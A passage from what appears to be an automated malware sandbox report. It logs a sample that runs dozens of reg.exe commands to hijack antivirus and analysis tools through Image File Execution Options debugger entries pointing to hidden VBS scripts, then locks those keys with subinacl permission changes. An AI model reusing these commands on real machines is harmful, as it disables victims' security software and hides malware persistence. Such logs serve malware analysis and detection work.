    3⤵
    PID:924
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\StartupChecker.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysInspector.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:372
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spydetector323eng.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2580
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswclear5.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bot.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\revshow.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3252
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgarkt.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:4740
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSys_Monitor.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:440
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NLBrute.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:804
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brute.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\srs.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\srs.exe.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetMonitor.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDSC.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESETPoweliksCleaner.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3440
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Private Keeper.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NLBrute 1.2.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AnVir.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\turbomailer.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svdhost.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frdpb_v2.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswclear.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pr.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WindowsUpdate.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OpenHardwareMonitor.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NL.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmpenc_st.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1112
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Pauscher.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ess.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4164
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hscangui.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3236
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Process Explorer.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:636
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Dr.Web.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2944
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\massscan_launcher.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3840
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NLBrute1.2.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RDP Brute_Cracked.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\framework.vbs" /f
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVRT.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\netframework.vbs" /f
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NLBrute 1.2 x64.exe" /v "debugger" /t REG_SZ /d "cmd /c start /MIN wscript //nologo C:\Windows\runtime.vbs" /f
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\reg.exe
    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anvirlauncher.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:400
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anvirlauncher.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4092
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1sass.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3306.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4640
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a1g.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2guard.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2service.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2start.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4812
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aawservice.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2436
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4816
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2036
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3688
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2652
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1868
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Adguard.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4232
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdguardSvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:5040
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Antivirus_Free_Edition_x86.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3560
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTIVIR▄.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2284
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AnVir.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3792
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\apgr.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3308
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ApVxdWin.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4616
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASCService.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3648
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASCTray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2096
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASMAIN.EXE" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3940
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ASP.NET.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2892
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswclear.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:392
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswclear5.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4800
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atiecla.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4400
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auditd.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:648
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoDENGI.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:2596
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3220
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4884
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgarkt.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4348
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcefrend.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3540
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.ServiceHost.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:4496
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.Systray.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:1988
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpmapp.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:612
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avz.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3796
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BaiduAnSvc.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    - Executes dropped EXE
    PID:3092
- - C:\Windows\subinacl.exe
